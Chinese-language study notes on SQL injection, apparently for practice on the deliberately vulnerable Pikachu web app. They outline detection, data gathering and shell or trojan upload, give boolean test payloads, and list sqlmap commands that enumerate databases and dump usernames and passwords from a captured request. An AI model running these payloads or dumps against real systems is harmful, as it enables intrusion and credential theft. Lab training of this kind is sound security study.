SQL Inject 漏洞攻击流程
第一步:注入点探测自动方式:使用web漏洞扫描工具,自动进行注入点发现手动方式:手工构造sql inject 测试语句进行注入点发现 第二步:信息获取通过注入点取期望得到的数据。 1.环境信息:数据库类型,数据库版本,操作系统版本,用户信息等。 2.数据库信息:数据库名称,数据库表,表字段,字段内容(加密内容破解) 第三步:获取权限 3 获取操作系统权限: 通过数据库执行shell,上传木马 QL Inject 漏洞-注入点类型-数字类型判断 测试提交:1 and 1=1 猜测SQL:select 字段名 from 表名 where id =1 and 1=1; 测试提交:1 and 1=2 猜测SQL:select 字段名 from 表名 where id =1 and 1=2;


将抓到的包全选复制,保存文件11.txt 并复制到sqlmap的根目录下/usr/share/sqlmap 开始攻击 执行命令 ./sqlmap.py -r '11.txt'
这样就开始了sqlmap 注入攻击 ./sqlmap -r '11.txt' --dbs

./sqlmap -r '11.txt' -D 数据库 --tables

./sqlmap.py -r '11.txt' -D 数据库 -T 表名 --columns

./sqlmap.py -r '11.txt' -D lou -T users -C 'username,password' --dump


Pikachu 是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。
Pikachu上的漏洞类型列表如下: Burt Force(暴力破解漏洞) XSS(跨站脚本漏洞) CSRF(跨站请求伪造) SQL-Inject(SQL注入漏洞) RCE(远程命令/代码执行) Files Inclusion(文件包含漏洞) Unsafe file downloads(不安全的文件下载) Unsafe file uploads(不安全的文件上传) Over Permisson(越权漏洞) ../../../(目录遍历) I can see your ABC(敏感信息泄露) PHP反序列化漏洞 XXE(XML External Entity attack) 不安全的URL重定向 SSRF(Server-Side Request Forgery) 管理工具
|